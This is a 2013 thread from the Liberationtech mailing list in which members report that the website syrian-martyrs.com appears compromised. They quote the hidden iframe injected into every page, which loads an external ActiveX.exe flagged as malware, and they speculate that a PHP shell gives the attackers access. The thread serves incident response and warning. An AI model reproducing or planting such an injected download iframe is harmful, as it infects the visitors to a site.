-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 This is the malware: > https://www.virustotal.com/file/cfdd3a78a895b3f49a39402eb28b0d2134cc3086849a41a6fdfe7d829a0d4dcd/analysis/
- --SiNA SiNA > Rabbani: > holly shit: > > <iframe name="I1" width="10" height="10" > src="http://acadcisco.unisla.pt/downloads/uploads/software/ActiveX.exe"; > > border="0" > frameborder="0"> > > > :/ if you are running windows don't even go there!!! > > > Andrew Lewis: >> I can get to this in 6 hours or so, maybe someone is willing to >> jump on this before then? > >> -Andrew > >> On Jan 30, 2013, at 11:06 AM, KheOps <[email protected]> wrote: > >>> Dear Libtech, >>> >>> We just saw that the website : http://www.syrian-martyrs.com >>> is probably compromised. Every page of the website contains an >>> iFrame which links to a .exe file which is detected as a virus >>> by antivirus software: >>> http://acadcisco.unisla.pt/downloads/uploads/software/ActiveX.exe >>> >>> >>> > >>> The fact that the HTML code is present at the bottom of each page makes >>> me think that the "index.php" page has been changed in a way >>> that makes that iFrame appear on every page of the website, >>> after the dynamic content. >>> >>> It also probably means that the attackers have some kind of >>> access to the server. My guess would be going to a PHP shell, >>> but I'm no expert in this. >>> >>> Any help, clue, investigation, would be very welcome :) >>> >>> Thank you, KheOps >>> >>> -- Unsubscribe, change to digest, or change password at: >>> https://mailman.stanford.edu/mailman/listinfo/liberationtech >> -- Unsubscribe, change to digest, or change password at: >> https://mailman.stanford.edu/mailman/listinfo/liberationtech > > > > - -- “Be the change you want to see in the world.” Gandhi OTR: [email protected] a5dae15f45a37e9768f6deae7b54807fc4942ec9 -----BEGIN PGP SIGNATURE----- iQIcBAEBCgAGBQJRCE5pAAoJEDxieAEiLOmoxJMP/iQNfzxEQcQ81Yp8JtGJmos0 sO+G2HSosH5OD2+PWSXjLuIT7rwijZSgh4XeFz2vIbSicvv1xJZoPzmiUVhKC4GB 9nzUNar86XgtXx2yXCpCjSgQcVwWB2ZRZL6OeZM5DXPUjC/AINXCPQc4rGU1Mcak B22oBaqiHrWjk5mPQZNcnoJVD2IyL9ZaQBt3WtjLVZo3s59j5vEW/MVqiIrqJiSR E7m5ehPnfyh4KUKwEe2+/PF9K3e4o8v0DquJhbjxsu0ibfDJg/6cqKaiPYZvOv77 dSQ9YcOOFjHzOYUa/yeTZ2ea92LJPe58IsiIJQxmDWsOFV/upLn1hhVdONN+fTHO tKzcuCDjqwN1DCWPiyZe7y1EJzl6giplzXNk+XeoXwDau530u5iI65YwQBVtPEsA kqwHQQxOFsL5kx/JEdO+rKQcX9jAZAkQ9vF6XfNeOGvzwsvLJHbIlFPwxXP/CPjM kUMdkAjRghEM8kMB9D3BI2MI/uWJN9EVe46ZPQpfmVNBf5Uen9ROyKSp1/h9t9Wy fbWBDVGJms4rU9rVRsyYhFl3eiHfVDy2/y1yFLEzfCXqEJw7OHAstNJ3O8d+iDKI WLhlIFej4CyDjzyLy1P9k4YTnv3ZR16hHftIXXT+zj8sKPYXbawiAGWtwbBGws8j 8ijLbNKdHoHtJlcOGMwg =+vsJ -----END PGP SIGNATURE----- -- Unsubscribe, change to digest, or change password at: https://mailman.stanford.edu/mailman/listinfo/liberationtech
